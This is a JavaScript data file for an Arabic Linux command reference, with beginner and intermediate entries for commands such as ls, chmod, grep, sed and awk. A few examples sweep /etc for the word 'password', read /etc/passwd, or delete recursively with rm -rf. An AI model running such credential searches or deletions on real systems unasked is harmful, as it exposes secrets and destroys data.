// ============================================================
// LINUX ENCYCLOPEDIA — DATA FILE
// All commands organized by level (1=Beginner → 5=OffSec)
// Each command: { id, name, icon, desc, syntax, level, category, flags[], examples[], note }
// ============================================================
window.LINUX_COMMANDS = [

// ╔══════════════════════════════════════════════╗
// ║  LEVEL 1 — BEGINNER (التنقل والأساسيات)      ║
// ╚══════════════════════════════════════════════╝

// --- Navigation ---
{id:'pwd',name:'pwd',icon:'📍',level:1,category:'التنقل',
 desc:'اعرف مكانك الحالي في شجرة المجلدات (Print Working Directory)',
 syntax:'pwd [OPTION]',
 flags:[
   {flag:'-L',desc:'اعرض المسار المنطقي (مع Symbolic Links)'},
   {flag:'-P',desc:'اعرض المسار الفيزيائي الحقيقي'},
 ],
 examples:['pwd','pwd -P'],
 note:'أول أمر تتعلمه! يخبرك بمكانك في نظام الملفات.'
},
{id:'ls',name:'ls',icon:'📂',level:1,category:'التنقل',
 desc:'اعرض محتويات المجلد (List directory contents)',
 syntax:'ls [OPTIONS] [PATH]',
 flags:[
   {flag:'-l',desc:'عرض تفصيلي (الصلاحيات، الحجم، التاريخ)'},
   {flag:'-a',desc:'اعرض الملفات المخفية (تبدأ بنقطة)'},
   {flag:'-h',desc:'حجم الملفات بصيغة مقروءة (KB, MB, GB)'},
   {flag:'-R',desc:'اعرض المجلدات بشكل تكراري (Recursive)'},
   {flag:'-t',desc:'رتّب حسب وقت التعديل (أحدث أولاً)'},
   {flag:'-S',desc:'رتّب حسب الحجم (الأكبر أولاً)'},
   {flag:'-r',desc:'عكس ترتيب العرض (Reverse)'},
   {flag:'-1',desc:'اعرض كل ملف في سطر منفصل'},
   {flag:'--color',desc:'الألوان لتمييز الأنواع (مجلد/ملف/رابط)'},
   {flag:'-i',desc:'اعرض رقم inode لكل ملف'},
   {flag:'-d',desc:'اعرض المجلد نفسه لا محتوياته'},
 ],
 examples:['ls','ls -la','ls -lh /var/log','ls -lt --color','ls -laR /home'],
 note:'الجمع الشائع: ls -la يعرض كل شيء بالتفاصيل.'
},
{id:'cd',name:'cd',icon:'🚶',level:1,category:'التنقل',
 desc:'انتقل من مجلد إلى آخر (Change Directory)',
 syntax:'cd [PATH]',
 flags:[
   {flag:'cd ~',desc:'انتقل للمجلد الرئيسي (Home)'},
   {flag:'cd ..',desc:'ارجع مجلد واحد للخلف'},
   {flag:'cd -',desc:'ارجع للمجلد السابق'},
   {flag:'cd /',desc:'انتقل لجذر النظام (Root)'},
   {flag:'cd /path',desc:'انتقل بمسار مطلق'},
   {flag:'cd rel/path',desc:'انتقل بمسار نسبي'},
 ],
 examples:['cd /etc','cd ../..','cd ~/Documents','cd -'],
 note:'cd بدون أي وسيطة يرجعك للمجلد الرئيسي مباشرة.'
},
{id:'mkdir',name:'mkdir',icon:'📁',level:1,category:'الملفات',
 desc:'أنشئ مجلداً جديداً (Make Directory)',
 syntax:'mkdir [OPTIONS] DIR_NAME',
 flags:[
   {flag:'-p',desc:'أنشئ المجلدات المتداخلة دفعة واحدة'},
   {flag:'-m MODE',desc:'حدد صلاحيات المجلد عند الإنشاء (مثل 755)'},
   {flag:'-v',desc:'اعرض رسالة لكل مجلد يُنشأ'},
 ],
 examples:['mkdir mydir','mkdir -p /opt/app/config/logs','mkdir -m 700 private','mkdir dir1 dir2 dir3'],
 note:'الخيار -p مفيد جداً لإنشاء هيكل مجلدات كامل دفعة واحدة.'
},
{id:'rmdir',name:'rmdir',icon:'🗑️',level:1,category:'الملفات',
 desc:'احذف مجلداً فارغاً (Remove empty Directory)',
 syntax:'rmdir [OPTIONS] DIR',
 flags:[
   {flag:'-p',desc:'احذف المجلد وآباؤه إن أصبحوا فارغين'},
   {flag:'-v',desc:'اعرض تفاصيل ما يُحذف'},
 ],
 examples:['rmdir emptydir','rmdir -p a/b/c'],
 note:'لا يحذف المجلدات التي تحتوي على ملفات — استخدم rm -rf لذلك.'
},
{id:'touch',name:'touch',icon:'✏️',level:1,category:'الملفات',
 desc:'أنشئ ملفاً فارغاً أو حدّث وقت الوصول/التعديل',
 syntax:'touch [OPTIONS] FILE',
 flags:[
   {flag:'-a',desc:'حدّث وقت الوصول فقط'},
   {flag:'-m',desc:'حدّث وقت التعديل فقط'},
   {flag:'-t STAMP',desc:'حدد وقتاً معيناً [YYMMDDhhmm]'},
   {flag:'-c',desc:'لا تُنشئ الملف إن لم يكن موجوداً'},
 ],
 examples:['touch file.txt','touch -t 202601010000 file.txt','touch file1 file2 file3'],
},
{id:'cp',name:'cp',icon:'📑',level:1,category:'الملفات',
 desc:'انسخ الملفات والمجلدات (Copy)',
 syntax:'cp [OPTIONS] SOURCE DEST',
 flags:[
   {flag:'-r / -R',desc:'انسخ المجلدات بشكل تكراري'},
   {flag:'-i',desc:'اسأل قبل الكتابة فوق ملف موجود'},
   {flag:'-p',desc:'احتفظ بالصلاحيات والوقت والمالك'},
   {flag:'-a',desc:'Archive: يجمع -r -p وينسخ الروابط الرمزية'},
   {flag:'-u',desc:'انسخ فقط إن كان المصدر أحدث من الوجهة'},
   {flag:'-v',desc:'اعرض ما يُنسخ'},
   {flag:'-f',desc:'اكتب فوق بدون سؤال (Force)'},
   {flag:'-n',desc:'لا تكتب فوق ملف موجود (No-clobber)'},
   {flag:'--backup',desc:'أنشئ نسخة احتياطية للملفات المطابقة'},
 ],
 examples:['cp file.txt /tmp/','cp -r /etc /backup/','cp -av /home/user/ /backup/user/','cp -u *.log /logs/'],
 note:'cp -a هو الأمثل للنسخ مع الحفاظ على كل الخصائص.'
},
{id:'mv',name:'mv',icon:'✂️',level:1,category:'الملفات',
 desc:'انقل أو أعد تسمية الملفات والمجلدات (Move)',
 syntax:'mv [OPTIONS] SOURCE DEST',
 flags:[
   {flag:'-i',desc:'اسأل قبل الكتابة فوق ملف موجود'},
   {flag:'-f',desc:'اكتب فوق بدون سؤال'},
   {flag:'-u',desc:'انقل فقط إن كان المصدر أحدث'},
   {flag:'-v',desc:'اعرض ما يُنقل'},
   {flag:'-n',desc:'لا تكتب فوق ملف موجود'},
   {flag:'--backup',desc:'أنشئ نسخة احتياطية قبل الكتابة'},
 ],
 examples:['mv old.txt new.txt','mv file.txt /tmp/','mv -iv *.jpg /home/pics/'],
},
{id:'rm',name:'rm',icon:'🗑️',level:1,category:'الملفات',
 desc:'احذف الملفات والمجلدات (Remove) — تحذير: لا تراجع!',
 syntax:'rm [OPTIONS] FILE',
 flags:[
   {flag:'-r / -R',desc:'احذف المجلدات بشكل تكراري'},
   {flag:'-f',desc:'احذف بدون سؤال حتى لو الملف غير موجود'},
   {flag:'-i',desc:'اسأل قبل حذف كل ملف'},
   {flag:'-I',desc:'اسأل مرة واحدة قبل حذف أكثر من 3 ملفات'},
   {flag:'-v',desc:'اعرض ما يُحذف'},
   {flag:'-d',desc:'احذف المجلد الفارغ'},
 ],
 examples:['rm file.txt','rm -rf /tmp/oldstuff/','rm -i *.tmp','rm -rfv /var/cache/'],
 note:'⚠️ rm -rf بدون مسار محدد يمكن أن يدمر النظام! دائماً تحقق من المسار.'
},
{id:'cat',name:'cat',icon:'📄',level:1,category:'النصوص',
 desc:'اعرض محتوى الملف أو ادمج ملفات متعددة (Concatenate)',
 syntax:'cat [OPTIONS] [FILE...]',
 flags:[
   {flag:'-n',desc:'أضف أرقام الأسطر'},
   {flag:'-b',desc:'أضف أرقام للأسطر غير الفارغة فقط'},
   {flag:'-A',desc:'اعرض رموز خاصة (نهاية السطر $، Tab ^I)'},
   {flag:'-s',desc:'اضغط الأسطر الفارغة المتتالية إلى سطر واحد'},
   {flag:'-T',desc:'اعرض التابات كـ ^I'},
   {flag:'-E',desc:'اعرض $ في نهاية كل سطر'},
 ],
 examples:['cat /etc/passwd','cat -n file.txt','cat file1 file2 > combined.txt','cat > newfile.txt'],
 note:'cat يُستخدم أيضاً لإنشاء ملفات بكتابة النص ثم Ctrl+D.'
},
{id:'less',name:'less',icon:'📖',level:1,category:'النصوص',
 desc:'تصفح الملفات الكبيرة صفحة بصفحة',
 syntax:'less [OPTIONS] FILE',
 flags:[
   {flag:'-N',desc:'أظهر أرقام الأسطر'},
   {flag:'-i',desc:'البحث غير حساس لحالة الأحرف'},
   {flag:'-S',desc:'لا تقطع الأسطر الطويلة'},
   {flag:'+/PATTERN',desc:'افتح الملف مباشرة عند أول تطابق'},
   {flag:'-F',desc:'اخرج تلقائياً إن كان الملف صغيراً'},
 ],
 examples:['less /var/log/messages','less +/error /var/log/syslog','less -N /etc/fstab'],
 note:'داخل less: مسافة=صفحة تالية، b=صفحة سابقة، /=بحث، q=خروج, G=نهاية الملف.'
},
{id:'more',name:'more',icon:'📃',level:1,category:'النصوص',
 desc:'اعرض محتوى الملف صفحة بصفحة (أقل مرونة من less)',
 syntax:'more [OPTIONS] FILE',
 flags:[
   {flag:'-n NUM',desc:'حجم الصفحة بعدد الأسطر'},
   {flag:'+NUM',desc:'ابدأ من سطر رقم NUM'},
   {flag:'-s',desc:'اضغط الأسطر الفارغة'},
 ],
 examples:['more /etc/services','more +50 largefile.txt'],
},
{id:'head',name:'head',icon:'⬆️',level:1,category:'النصوص',
 desc:'اعرض أول N سطر من الملف',
 syntax:'head [OPTIONS] FILE',
 flags:[
   {flag:'-n NUM',desc:'اعرض أول NUM سطر (افتراضي 10)'},
   {flag:'-c NUM',desc:'اعرض أول NUM بايت'},
   {flag:'-q',desc:'لا تعرض اسم الملف عند تعدد الملفات'},
   {flag:'-v',desc:'دائماً اعرض اسم الملف'},
 ],
 examples:['head /etc/passwd','head -n 20 /var/log/syslog','head -c 100 file.bin'],
},
{id:'tail',name:'tail',icon:'⬇️',level:1,category:'النصوص',
 desc:'اعرض آخر N سطر — مع -f لمتابعة الملفات الحية',
 syntax:'tail [OPTIONS] FILE',
 flags:[
   {flag:'-n NUM',desc:'اعرض آخر NUM سطر (افتراضي 10)'},
   {flag:'-f',desc:'تابع الملف وهو يتغير (Follow) — ممتاز للـ logs'},
   {flag:'-F',desc:'تابع الملف حتى لو أُعيد تسميته'},
   {flag:'-c NUM',desc:'اعرض آخر NUM بايت'},
   {flag:'--pid=PID',desc:'أوقف المتابعة عند انتهاء العملية PID'},
 ],
 examples:['tail -f /var/log/syslog','tail -n 50 /var/log/messages','tail -f -n 20 app.log'],
 note:'tail -f هو أداتك الأولى لمراقبة السجلات في الوقت الحقيقي!'
},
{id:'echo',name:'echo',icon:'💬',level:1,category:'النصوص',
 desc:'اطبع نصاً أو قيمة متغير',
 syntax:'echo [OPTIONS] [STRING]',
 flags:[
   {flag:'-n',desc:'لا تطبع سطر جديد في النهاية'},
   {flag:'-e',desc:'فسّر الحروف الخاصة (\\n, \\t, \\a...)'},
   {flag:'-E',desc:'لا تفسر الحروف الخاصة (افتراضي)'},
 ],
 examples:['echo "Hello World"','echo $PATH','echo -e "Line1\\nLine2"','echo -n "no newline"','echo "text" >> file.txt'],
 note:'استخدم echo مع > أو >> لكتابة النصوص في الملفات بسرعة.'
},
{id:'wc',name:'wc',icon:'🔢',level:1,category:'النصوص',
 desc:'عدّ الأسطر والكلمات والأحرف في الملفات (Word Count)',
 syntax:'wc [OPTIONS] [FILE...]',
 flags:[
   {flag:'-l',desc:'عدد الأسطر فقط'},
   {flag:'-w',desc:'عدد الكلمات فقط'},
   {flag:'-c',desc:'عدد البايتات'},
   {flag:'-m',desc:'عدد الأحرف'},
   {flag:'-L',desc:'طول أطول سطر'},
 ],
 examples:['wc file.txt','wc -l /etc/passwd','cat /var/log/syslog | wc -l','wc -w essay.txt'],
},
{id:'clear',name:'clear',icon:'🧹',level:1,category:'الواجهة',
 desc:'نظّف شاشة الطرفية',
 syntax:'clear',
 flags:[{flag:'Ctrl+L',desc:'اختصار لوحة المفاتيح لنفس الغرض'}],
 examples:['clear'],
},
{id:'history',name:'history',icon:'⏰',level:1,category:'الواجهة',
 desc:'اعرض سجل الأوامر السابقة',
 syntax:'history [N]',
 flags:[
   {flag:'-c',desc:'امسح سجل الأوامر كله'},
   {flag:'-d N',desc:'احذف الأمر رقم N من السجل'},
   {flag:'-w',desc:'احفظ السجل الحالي للملف'},
   {flag:'!!',desc:'أعد تنفيذ آخر أمر'},
   {flag:'!N',desc:'أعد تنفيذ الأمر رقم N'},
   {flag:'!text',desc:'أعد تنفيذ آخر أمر يبدأ بـ text'},
 ],
 examples:['history','history 20','history | grep ssh','!150','!!'],
 note:'Ctrl+R للبحث التفاعلي في السجل — من أقوى اختصارات الطرفية!'
},
{id:'man',name:'man',icon:'📚',level:1,category:'المساعدة',
 desc:'اعرض دليل الاستخدام (Manual) لأي أمر',
 syntax:'man [SECTION] COMMAND',
 flags:[
   {flag:'-k KEYWORD',desc:'ابحث في كل صفحات man (مثل apropos)'},
   {flag:'-f CMD',desc:'اعرض وصفاً موجزاً للأمر'},
   {flag:'-a',desc:'اعرض كل نسخ man للأمر'},
   {flag:'1',desc:'أوامر المستخدم العادي'},
   {flag:'5',desc:'صيغ ملفات الضبط'},
   {flag:'8',desc:'أوامر المدير (root)'},
 ],
 examples:['man ls','man 5 passwd','man -k network','man -f chmod'],
 note:'داخل man: /pattern للبحث، q للخروج، h للمساعدة.'
},
{id:'info',name:'info',icon:'ℹ️',level:1,category:'المساعدة',
 desc:'اعرض وثائق GNU (أكثر تفصيلاً من man)',
 syntax:'info [COMMAND]',
 flags:[],
 examples:['info ls','info bash'],
},
{id:'whatis',name:'whatis',icon:'❓',level:1,category:'المساعدة',
 desc:'اعرض وصفاً قصيراً للأمر',
 syntax:'whatis COMMAND',
 flags:[],
 examples:['whatis ls','whatis chmod'],
},
{id:'which',name:'which',icon:'📌',level:1,category:'المساعدة',
 desc:'اعرض المسار الكامل للأمر في PATH',
 syntax:'which COMMAND',
 flags:[{flag:'-a',desc:'اعرض كل المسارات المطابقة'}],
 examples:['which python3','which -a java','which grep'],
},
{id:'type',name:'type',icon:'🔍',level:1,category:'المساعدة',
 desc:'اعرض نوع الأمر (built-in, alias, file)',
 syntax:'type COMMAND',
 flags:[
   {flag:'-a',desc:'اعرض كل المواضع'},
   {flag:'-t',desc:'اعرض النوع فقط'},
 ],
 examples:['type ls','type cd','type -a echo'],
},
{id:'date',name:'date',icon:'📅',level:1,category:'النظام',
 desc:'اعرض أو عدّل التاريخ والوقت الحالي',
 syntax:'date [OPTIONS] [+FORMAT]',
 flags:[
   {flag:'+%Y-%m-%d',desc:'تنسيق: 2025-01-15'},
   {flag:'+%H:%M:%S',desc:'الوقت: 14:30:00'},
   {flag:'+%s',desc:'Unix timestamp (ثانية من 1970)'},
   {flag:'-u',desc:'اعرض بتوقيت UTC'},
   {flag:'-s STRING',desc:'اضبط الوقت (root فقط)'},
   {flag:'-d STRING',desc:'أظهر تاريخاً محدداً'},
 ],
 examples:['date','date +"%Y-%m-%d %H:%M"','date -u','date -d "next monday"','date +%s'],
},
{id:'cal',name:'cal',icon:'🗓️',level:1,category:'النظام',
 desc:'اعرض تقويم الشهر أو السنة',
 syntax:'cal [MONTH] [YEAR]',
 flags:[
   {flag:'-3',desc:'اعرض الشهر السابق والحالي والتالي'},
   {flag:'-y',desc:'اعرض السنة بأكملها'},
   {flag:'-m MONTH',desc:'حدد الشهر'},
   {flag:'-j',desc:'اعرض اليوم من بداية السنة (Julian)'},
 ],
 examples:['cal','cal 2025','cal -3','cal 6 2025'],
},
{id:'uname',name:'uname',icon:'🖥️',level:1,category:'النظام',
 desc:'اعرض معلومات النظام والنواة (Kernel)',
 syntax:'uname [OPTIONS]',
 flags:[
   {flag:'-a',desc:'اعرض كل المعلومات'},
   {flag:'-r',desc:'نسخة النواة فقط'},
   {flag:'-s',desc:'اسم نظام التشغيل'},
   {flag:'-n',desc:'اسم الجهاز (hostname)'},
   {flag:'-m',desc:'نوع المعالج (x86_64, arm...)'},
   {flag:'-o',desc:'نظام التشغيل'},
 ],
 examples:['uname -a','uname -r','uname -m'],
 note:'uname -r مهم جداً لمعرفة نسخة الكيرنل.'
},
{id:'hostname',name:'hostname',icon:'🏷️',level:1,category:'النظام',
 desc:'اعرض أو غيّر اسم الجهاز',
 syntax:'hostname [OPTIONS] [NAME]',
 flags:[
   {flag:'-I',desc:'اعرض كل عناوين IP للجهاز'},
   {flag:'-f',desc:'اعرض الاسم الكامل (FQDN)'},
   {flag:'-s',desc:'اعرض الاسم القصير'},
   {flag:'-d',desc:'اعرض اسم النطاق'},
 ],
 examples:['hostname','hostname -I','hostname -f','hostname newname'],
},
{id:'uptime',name:'uptime',icon:'⏱️',level:1,category:'النظام',
 desc:'مدة تشغيل الجهاز وعدد المستخدمين وحمل النظام',
 syntax:'uptime [OPTIONS]',
 flags:[
   {flag:'-p',desc:'اعرض بصيغة مقروءة (pretty)'},
   {flag:'-s',desc:'وقت بدء تشغيل النظام'},
 ],
 examples:['uptime','uptime -p','uptime -s'],
},
{id:'whoami',name:'whoami',icon:'👤',level:1,category:'المستخدمون',
 desc:'اعرض اسم المستخدم الحالي',
 syntax:'whoami',
 flags:[],
 examples:['whoami'],
},
{id:'who',name:'who',icon:'👥',level:1,category:'المستخدمون',
 desc:'اعرض المستخدمين المتصلين حالياً بالنظام',
 syntax:'who [OPTIONS]',
 flags:[
   {flag:'-a',desc:'اعرض كل المعلومات'},
   {flag:'-b',desc:'آخر مرة أُعيد تشغيل النظام'},
   {flag:'-q',desc:'عدد المستخدمين فقط'},
   {flag:'-H',desc:'اعرض رؤوس الأعمدة'},
 ],
 examples:['who','who -a','who -b'],
},
{id:'id',name:'id',icon:'🪪',level:1,category:'المستخدمون',
 desc:'اعرض UID وGID والمجموعات للمستخدم',
 syntax:'id [USER]',
 flags:[
   {flag:'-u',desc:'UID فقط'},
   {flag:'-g',desc:'GID الأساسي فقط'},
   {flag:'-G',desc:'كل GIDs'},
   {flag:'-n',desc:'اعرض الأسماء بدل الأرقام'},
 ],
 examples:['id','id root','id -u','id -Gn username'],
},

// --- File permissions basics ---
{id:'chmod',name:'chmod',icon:'🔐',level:1,category:'الصلاحيات',
 desc:'غيّر صلاحيات الملفات والمجلدات (Change Mode)',
 syntax:'chmod [OPTIONS] MODE FILE',
 flags:[
   {flag:'-R',desc:'غيّر الصلاحيات بشكل تكراري'},
   {flag:'-v',desc:'اعرض ما تغيّر'},
   {flag:'-c',desc:'اعرض فقط التغييرات الفعلية'},
   {flag:'u+x',desc:'أضف إذن التنفيذ للمالك'},
   {flag:'g-w',desc:'أزل إذن الكتابة من المجموعة'},
   {flag:'o=r',desc:'اضبط إذن القراءة فقط للآخرين'},
   {flag:'a+r',desc:'أضف القراءة للجميع'},
   {flag:'755',desc:'rwxr-xr-x (شائع للمجلدات)'},
   {flag:'644',desc:'rw-r--r-- (شائع للملفات)'},
   {flag:'600',desc:'rw------- (ملف خاص)'},
   {flag:'777',desc:'rwxrwxrwx (الكل لديه كل شيء — خطر!)'},
   {flag:'000',desc:'--------- (لا أحد يقرأ أو يكتب)'},
 ],
 examples:['chmod 755 script.sh','chmod +x run.sh','chmod -R 644 /var/www/html','chmod u=rw,g=r,o= secret.txt'],
 note:'الأرقام: r=4, w=2, x=1. مثال: 7=rwx, 5=rx, 4=r فقط.'
},
{id:'chown',name:'chown',icon:'👑',level:1,category:'الصلاحيات',
 desc:'غيّر مالك الملف أو المجلد (Change Owner)',
 syntax:'chown [OPTIONS] USER[:GROUP] FILE',
 flags:[
   {flag:'-R',desc:'غيّر الملكية بشكل تكراري'},
   {flag:'-v',desc:'اعرض التغييرات'},
   {flag:'--from=USER',desc:'غيّر فقط الملفات المملوكة لهذا المستخدم'},
   {flag:'-h',desc:'غيّر مالك الرابط الرمزي نفسه'},
 ],
 examples:['chown user file.txt','chown user:group file','chown -R www-data /var/www/','chown :newgroup file'],
},
{id:'chgrp',name:'chgrp',icon:'👫',level:1,category:'الصلاحيات',
 desc:'غيّر المجموعة المالكة للملف (Change Group)',
 syntax:'chgrp [OPTIONS] GROUP FILE',
 flags:[
   {flag:'-R',desc:'تكراري'},
   {flag:'-v',desc:'اعرض التغييرات'},
 ],
 examples:['chgrp developers project/','chgrp -R www-data /var/www/'],
},
{id:'umask',name:'umask',icon:'🎭',level:1,category:'الصلاحيات',
 desc:'حدد قناع الصلاحيات الافتراضي عند إنشاء الملفات',
 syntax:'umask [MASK]',
 flags:[
   {flag:'-S',desc:'اعرض الـ umask بصيغة رمزية'},
   {flag:'022',desc:'الافتراضي: ملفات 644، مجلدات 755'},
   {flag:'027',desc:'أكثر أماناً: ملفات 640، مجلدات 750'},
 ],
 examples:['umask','umask 022','umask -S','umask 027'],
 note:'umask = 666 - صلاحيات الملف النهائية. 022 يعني 644 للملفات.'
},

// ╔══════════════════════════════════════════════╗
// ║  LEVEL 2 — INTERMEDIATE (النصوص والشبكات)   ║
// ╚══════════════════════════════════════════════╝
{id:'grep',name:'grep',icon:'🔎',level:2,category:'البحث والنصوص',
 desc:'ابحث عن نمط نصي في الملفات (Global Regular Expression Print)',
 syntax:'grep [OPTIONS] PATTERN [FILE...]',
 flags:[
   {flag:'-i',desc:'غير حساس لحالة الأحرف'},
   {flag:'-r / -R',desc:'بحث تكراري في المجلدات'},
   {flag:'-l',desc:'اعرض أسماء الملفات فقط'},
   {flag:'-L',desc:'الملفات التي لا تحتوي على النمط'},
   {flag:'-n',desc:'اعرض رقم السطر مع كل نتيجة'},
   {flag:'-c',desc:'اعرض عدد التطابقات فقط'},
   {flag:'-v',desc:'اعكس البحث (أسطر لا تطابق)'},
   {flag:'-w',desc:'تطابق كلمة كاملة فقط'},
   {flag:'-x',desc:'تطابق السطر بأكمله'},
   {flag:'-o',desc:'اعرض فقط الجزء المطابق'},
   {flag:'-A N',desc:'اعرض N سطر بعد التطابق (After)'},
   {flag:'-B N',desc:'اعرض N سطر قبل التطابق (Before)'},
   {flag:'-C N',desc:'اعرض N سطر قبل وبعد'},
   {flag:'-E',desc:'استخدم Regex الموسّع (egrep)'},
   {flag:'-P',desc:'استخدم Perl Regex (PCRE)'},
   {flag:'-F',desc:'نمط ثابت لا Regex (fgrep)'},
   {flag:'--color',desc:'لوّن النتائج المطابقة'},
   {flag:'-q',desc:'صامت، أعد فقط كود الخروج (0=وجد)'},
   {flag:'-m NUM',desc:'توقف بعد NUM تطابق'},
   {flag:'-h',desc:'لا تعرض اسم الملف'},
   {flag:'-H',desc:'دائماً اعرض اسم الملف'},
   {flag:'--include',desc:'حدد امتداد الملفات (مثل *.py)'},
   {flag:'--exclude',desc:'استثنِ امتداداً من البحث'},
 ],
 examples:[
   'grep "error" /var/log/syslog',
   'grep -ri "password" /etc/',
   'grep -n "root" /etc/passwd',
   'grep -v "^#" /etc/ssh/sshd_config',
   'grep -A 3 -B 1 "failed" auth.log',
   'grep -E "^[0-9]{1,3}\\." ips.txt',
   'grep -oP "\\d+\\.\\d+\\.\\d+\\.\\d+" access.log',
 ],
 note:'grep -v "^#" يُستخدم كثيراً لإزالة التعليقات من ملفات الضبط.'
},
{id:'sed',name:'sed',icon:'✍️',level:2,category:'البحث والنصوص',
 desc:'محرر نصوص سطري قوي (Stream Editor) — بحث واستبدال وحذف',
 syntax:'sed [OPTIONS] SCRIPT [FILE...]',
 flags:[
   {flag:'-i',desc:'عدّل الملف في مكانه (in-place)'},
   {flag:'-i.bak',desc:'عدّل مع نسخة احتياطية بامتداد .bak'},
   {flag:'-n',desc:'لا تطبع إلا ما تطلبه صراحةً'},
   {flag:'-e SCRIPT',desc:'أضف تعليمة متعددة'},
   {flag:'-r / -E',desc:'استخدم Regex الموسّع'},
   {flag:'s/old/new/',desc:'استبدل أول تطابق في السطر'},
   {flag:'s/old/new/g',desc:'استبدل كل التطابقات في السطر'},
   {flag:'s/old/new/I',desc:'استبدل بدون حساسية حروف'},
   {flag:'Nd',desc:'احذف السطر N'},
   {flag:'/pattern/d',desc:'احذف السطور المطابقة'},
   {flag:'/pattern/p',desc:'اطبع السطور المطابقة'},
   {flag:'Nq',desc:'اخرج بعد N سطر'},
 ],
 examples:[
   'sed "s/http/https/g" config.txt',
   "sed -i 's/old_server/new_server/g' app.conf",
   "sed -n '5,10p' file.txt",
   "sed '/^#/d' config.conf",
   "sed -i.bak 's/127.0.0.1/0.0.0.0/' server.conf",
   "sed '1d' file.csv",
 ],
 note:'sed -i بدون extension يُعدّل الملف مباشرة — كن حذراً!'
},
{id:'awk',name:'awk',icon:'🔧',level:2,category:'البحث والنصوص',
 desc:'لغة معالجة نصوص قوية — تقطيع، فلترة، حسابات على الأعمدة',
 syntax:'awk [OPTIONS] PROGRAM [FILE]',
 flags:[
   {flag:"-F','",desc:'حدد الفاصل (هنا: فاصلة)'},
   {flag:'-v VAR=VAL',desc:'أنشئ متغيراً مخصصاً'},
   {flag:'-f FILE',desc:'اقرأ البرنامج من ملف'},
   {flag:'NR',desc:'رقم السطر الحالي'},
   {flag:'NF',desc:'عدد الأعمدة في السطر'},
   {flag:'$1, $2...',desc:'الحقل الأول، الثاني...'},
   {flag:'$NF',desc:'آخر حقل في السطر'},
   {flag:'BEGIN{}',desc:'ينفّذ قبل قراءة أي سطر'},
   {flag:'END{}',desc:'ينفّذ بعد قراءة كل الأسطر'},
   {flag:'/pattern/',desc:'شغّل الكود على الأسطر المطابقة فقط'},
 ],
 examples:[
   "awk '{print $1}' /etc/passwd",
   "awk -F: '{print $1,$3}' /etc/passwd",
   "awk 'NR>=5 && NR<=10' file.txt",
   "awk '{sum+=$1} END{print sum}' numbers.txt",
   "awk -F: '$3==0{print $1}' /etc/passwd",
   "df -h | awk '{print $1, $5}'",
   "awk 'length($0)>80' file.txt",
 ],
 note:'awk هو سكين جيش سويسري لمعالجة البيانات المهيكلة!'
},
{id:'sort',name:'sort',icon:'🔡',level:2,category:'البحث والنصوص',
 desc:'رتّب أسطر الملفات أبجدياً أو رقمياً',
 syntax:'sort [OPTIONS] [FILE]',
 flags:[
   {flag:'-n',desc:'ترتيب رقمي (لا أبجدي)'},
   {flag:'-r',desc:'ترتيب معكوس'},
   {flag:'-u',desc:'أزل التكرارات (uniq)'},
   {flag:'-k N',desc:'رتّب حسب العمود N'},
   {flag:'-t CHAR',desc:'حدد فاصل الأعمدة'},
   {flag:'-f',desc:'غير حساس لحالة الأحرف'},
   {flag:'-h',desc:'ترتيب أحجام البشري (K,M,G)'},
   {flag:'-V',desc:'ترتيب طبيعي للإصدارات (1.9 < 1.10)'},
   {flag:'-o FILE',desc:'احفظ النتيجة في ملف'},
   {flag:'-c',desc:'تحقق أن الملف مرتب بالفعل'},
 ],
 examples:[
   'sort names.txt',
   'sort -rn numbers.txt',
   'sort -u list.txt',
   'sort -t: -k3 -n /etc/passwd',
   'du -sh * | sort -rh',
 ],
},
{id:'uniq',name:'uniq',icon:'🎯',level:2,category:'البحث والنصوص',
 desc:'أزل أو أظهر الأسطر المتكررة المتجاورة',
 syntax:'uniq [OPTIONS] [FILE]',
 flags:[
   {flag:'-c',desc:'اعرض عدد مرات تكرار كل سطر'},
   {flag:'-d',desc:'اعرض فقط الأسطر المكررة'},
   {flag:'-u',desc:'اعرض فقط الأسطر غير المكررة'},
   {flag:'-i',desc:'غير حساس لحالة الأحرف'},
 ],
 examples:[
   'sort file.txt | uniq',
   'sort ips.txt | uniq -c | sort -rn',
   'sort list.txt | uniq -d',
 ],
 note:'uniq يعمل فقط على أسطر متجاورة — دائماً استخدمه بعد sort.'
},
{id:'cut',name:'cut',icon:'✂️',level:2,category:'البحث والنصوص',
 desc:'اقطع أجزاء من كل سطر في الملف',
 syntax:'cut [OPTIONS] [FILE]',
 flags:[
   {flag:'-d CHAR',desc:'حدد الفاصل (delimiter)'},
   {flag:'-f N',desc:'اختار العمود N أو النطاق (1-3, 1,3)'},
   {flag:'-c N',desc:'اختر الأحرف بالموضع'},
   {flag:'--complement',desc:'اعكس التحديد'},
 ],
 examples:[
   'cut -d: -f1 /etc/passwd',
   'cut -d, -f1,3 data.csv',
   'cut -c1-10 file.txt',
   "echo 'a:b:c' | cut -d: -f2",
 ],
},
{id:'tr',name:'tr',icon:'🔄',level:2,category:'البحث والنصوص',
 desc:'ترجم أو احذف أحرفاً (Translate)',
 syntax:'tr [OPTIONS] SET1 [SET2]',
 flags:[
   {flag:'-d',desc:'احذف الأحرف في SET1'},
   {flag:'-s',desc:'اضغط تكرارات الأحرف'},
   {flag:'-c',desc:'اعكس مجموعة الأحرف'},
 ],
 examples:[
   "echo 'Hello' | tr 'a-z' 'A-Z'",
   "echo 'hello world' | tr ' ' '_'",
   "cat file.txt | tr -d '\\r'",
   "echo '   spaces   ' | tr -s ' '",
 ],
},
{id:'paste',name:'paste',icon:'📋',level:2,category:'البحث والنصوص',
 desc:'ادمج أسطر الملفات جنباً إلى جنب',
 syntax:'paste [OPTIONS] FILE1 FILE2',
 flags:[
   {flag:'-d CHAR',desc:'حدد الفاصل بين الأعمدة'},
   {flag:'-s',desc:'ادمج كل ملف أفقياً في سطر واحد'},
 ],
 examples:[
   'paste names.txt ages.txt',
   "paste -d',' file1 file2",
   "paste -s file.txt",
 ],
},
{id:'diff',name:'diff',icon:'⚖️',level:2,category:'البحث والنصوص',
 desc:'قارن ملفين وأظهر الاختلافات',
 syntax:'diff [OPTIONS] FILE1 FILE2',
 flags:[
   {flag:'-u',desc:'اعرض بصيغة unified (الأكثر شيوعاً)'},
   {flag:'-r',desc:'قارن مجلدات بشكل تكراري'},
   {flag:'-i',desc:'غير حساس لحالة الأحرف'},
   {flag:'-w',desc:'تجاهل الفراغات'},
   {flag:'-q',desc:'اذكر فقط إن اختلف الملفان'},
   {flag:'--color',desc:'ألوان لتمييز الإضافات والحذف'},
   {flag:'-y',desc:'عرض جنباً إلى جنب'},
 ],
 examples:[
   'diff file1.txt file2.txt',
   'diff -u original.conf new.conf',
   'diff -rq dir1/ dir2/',
 ],
},
